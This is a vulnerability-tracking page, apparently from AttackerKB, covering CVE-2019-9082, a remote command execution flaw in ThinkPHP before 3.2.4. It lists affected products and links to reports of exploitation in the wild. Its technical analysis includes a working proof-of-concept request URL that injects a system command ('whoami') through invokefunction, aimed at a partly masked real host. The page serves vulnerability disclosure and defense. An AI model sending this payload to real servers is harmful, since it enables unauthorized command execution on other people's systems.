Unknown
CVE-2019-9082
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2019-9082
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
ThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.
Add Assessment
Ratings
Technical Analysis
ThinkPHP RCE
DESCRIPTION
ThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.
PROOF OF CONCEPT
The RCE(Remote Command Execution) vulnerability is triggered by a http request.Successfully executed the command “whoami”.
poc:
http://58.82.XXX.XXX:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- opensourcebms,
- thinkphp,
- zzzcms
Products
- open source background management system 1.1.1,
- thinkphp,
- zzzphp 1.6.1
Exploited in the Wild
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- Threat Feed (https://fortiguard.fortinet.com/outbreak-alert/thinkphp-rce)
- News Article or Blog (https://www.f5.com/labs/articles/threat-intelligence/new-golang-malware-is-spreading-via-multiple-exploits-to-mine-mo)
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: